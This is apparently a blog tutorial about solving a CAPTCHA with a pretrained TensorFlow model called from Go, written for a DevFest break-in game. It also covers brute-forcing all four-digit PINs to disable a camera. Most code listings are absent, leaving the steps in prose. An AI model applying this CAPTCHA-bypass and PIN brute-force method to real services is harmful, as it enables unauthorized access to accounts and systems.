Solving CAPTCHA with TensorFlow and Go
A robot that proves it’s not a robot way better than I do
This article was first published at GopherAcademy. The Medium version has been edited and slightly restructured.
Before the Blacklight event at DevFest Siberia, I was tasked with play-testing a specific challenge to prove that it’s possible to crack in a reasonable time. That challenge was one I face occasionally in my everyday life, not always with success: solving a bunch of captchas.
At DevFest, people had to break into a room without surveillance cameras capturing the break-in attempt. Disabling the camera required entering a four-digit security PIN into a CAPTCHA-protected form.
An input of a TensorFlow model requires doing some TensorFlow!
A Few Words about TensorFlow
TensorFlow is an open-source software library for Machine Intelligence, used mainly for machine learning applications such as neural networks.
TensorFlow runs computations involving tensors. There are many sources to understand what a Tensor is, and this article is definitely not a sufficient one: it only has the bare minimum to make sense of what the code does. Tensors are awesome and complex mathematical objects, and I encourage you to take the time to learn more about them.
For our purposes, here is the explanation from the TensorFlow website:
A tensor is a generalization of vectors and matrices to potentially higher dimensions. Internally, TensorFlow represents tensors as n-dimensional arrays of base datatypes.
A tensor is defined by the data type of the values it holds and its shape, which is the number of dimensions and number of values per dimension.
The “Flow” part in TensorFlow comes to describe that essentially the graph (model) is a set of nodes (operations), and the data (tensors) “flows” through those nodes, undergoing mathematical manipulation. You can look at, and evaluate, any node of the graph.
A Few Words about TensorFlow + Go
On the official TensorFlow website, you can find a page dedicated to Go describing the recommended use:
TensorFlow provides APIs for use in Go programs. These APIs are particularly well-suited to loading models created in Python and executing them within a Go application.
It also warns that the TensorFlow Go API is not covered by the TensorFlow API stability guarantees, although to the date of this post, everything is still working as expected.
When going to the package page, there are two more warnings:
- The API defined in this package is not stable and can change without notice.
- The package path is awkward and can change in the future as well:
In theory, the Go APIs for TensorFlow are powerful enough to do anything you can do from the Python APIs, including training (Asim Shankar has a good example of training a model in Go using a graph written in Python). In practice, some of workflows, particularly those for model construction, are very low level and certainly not as convenient as in Python.
For now, it generally makes sense to define the model in TensorFlow for Python, export it, and then use the Go APIs for inference or training. So while Go might not be your first choice for working with TensorFlow, they do play nice together when using existing models.
Note: thanks to Asim Ahankar from the TensorFlow team for pointing out it is possible to train models with Go. We will collaborate further to make the documentation around this more accessible.
Let’s Break In
The interface I was facing seemed pretty close to your regular captcha-protected form. My TO DOs were:
- Inspect the model.
- Start with a boilerplate.
- Load the model.
- Fetch the captcha.
- Predict the captcha.
- Try to log in with the predicted captcha and a given PIN code.
- Iterate over all possible PIN codes.
SavedModel is the universal serialization format for TensorFlow models.
— TensorFlow documentation
We don’t know anything about the model, so our first step would be figuring out the input and output nodes for prediction. The SavedModel format allows storing this information, called a signature, as metadata; the tool for inspecting signatures is SavedModel CLI. Here’s the command and its output:
$ saved_model_cli show --dir ./tensorflow_savedmodel_captcha --allMetaGraphDef with tag-set: 'serve' contains the following SignatureDefs:signature_def['serving_default']:The given SavedModel SignatureDef contains the following input(s):
name: CAPTCHA/input_image_as_bytes:0The given SavedModel SignatureDef contains the following output(s):
name: CAPTCHA/prediction:0Method name is: tensorflow/serving/predict
What we learn from this are the node names used with the tag
Let’s define constants for the camera URL and for the error messages we already know:
We’ll add a log file support to our
main() function to make sure everything is logged properly:
And implement a
logResponse function for our login attempts. If the response is unknown, we’ll output it in full. Otherwise we’ll add a short entry to either the logfile or stdout.
Now let’s load the model with
LoadSavedModel. The full signature is:
func LoadSavedModel(exportDir string, tags string, options *SessionOptions) (*SavedModel, error)
The function takes 3 arguments: path, tags and session options. Explaining tags and options can easily take the entire post and will shift the focus, so for now you should know that
serve is the tag used to serve TensorFlow models, and session options are not required in our case.
Now let’s get the captcha image.
In order to keep the session with the generated captcha, we will first open a cookie jar. Even though it’s the first time I am writing about cookies publicly, I will spare cookie jokes as part of the Christmas spirit.
To run a prediction we need to supply inputs, called feeds (operations to feed our data to, mapped to tensors containing the data), and outputs, called fetches (operations to fetch the data from).
We only have one feed (input):
- the feed operation is
- the feed tensor is a string containing the CAPTCHA image as bytes.
Likewise, there is only one fetch (output):
After we run the model with our feeds and fetches, we receive the output — the captcha prediction.
6. Log In
Once the values — the PIN code and the captcha prediction — are there, let’s POST the request to disable the camera.
If the captcha prediction failed, we retry with the same PIN code.
parseResponse function checks and reports whether the response is one of the known error messages, which I’ve found out manually by guessing PIN codes and making both correct and incorrect captcha predictions.
The PIN code only has 4 digits, so we’ll just go over all the combinations. Additionally, in each iteration the loaded model is required for the prediction operation, and of course some logs.
To Wrap This Up
The full code after everything is composed together is available on GitHub: Pisush/break-captcha-tensorflow.
TensorFlow has many models which can all be used with Go. There is a great list of those at tensorflow/models.
The pre-trained model provided for the challenge is based on emedvedev/attention-ocr.
Online challenges can be an awesome way to learn, whether it’s coding, security or sports. The combination of putting in practice your knowledge and having a mission creates a fun environment where you can work on improving your skills. Consider joining such a challenge as your new year’s resolution.
Even more stories about solving captchas, picking locks and investigating conspiracies: @blacklightai on Twitter.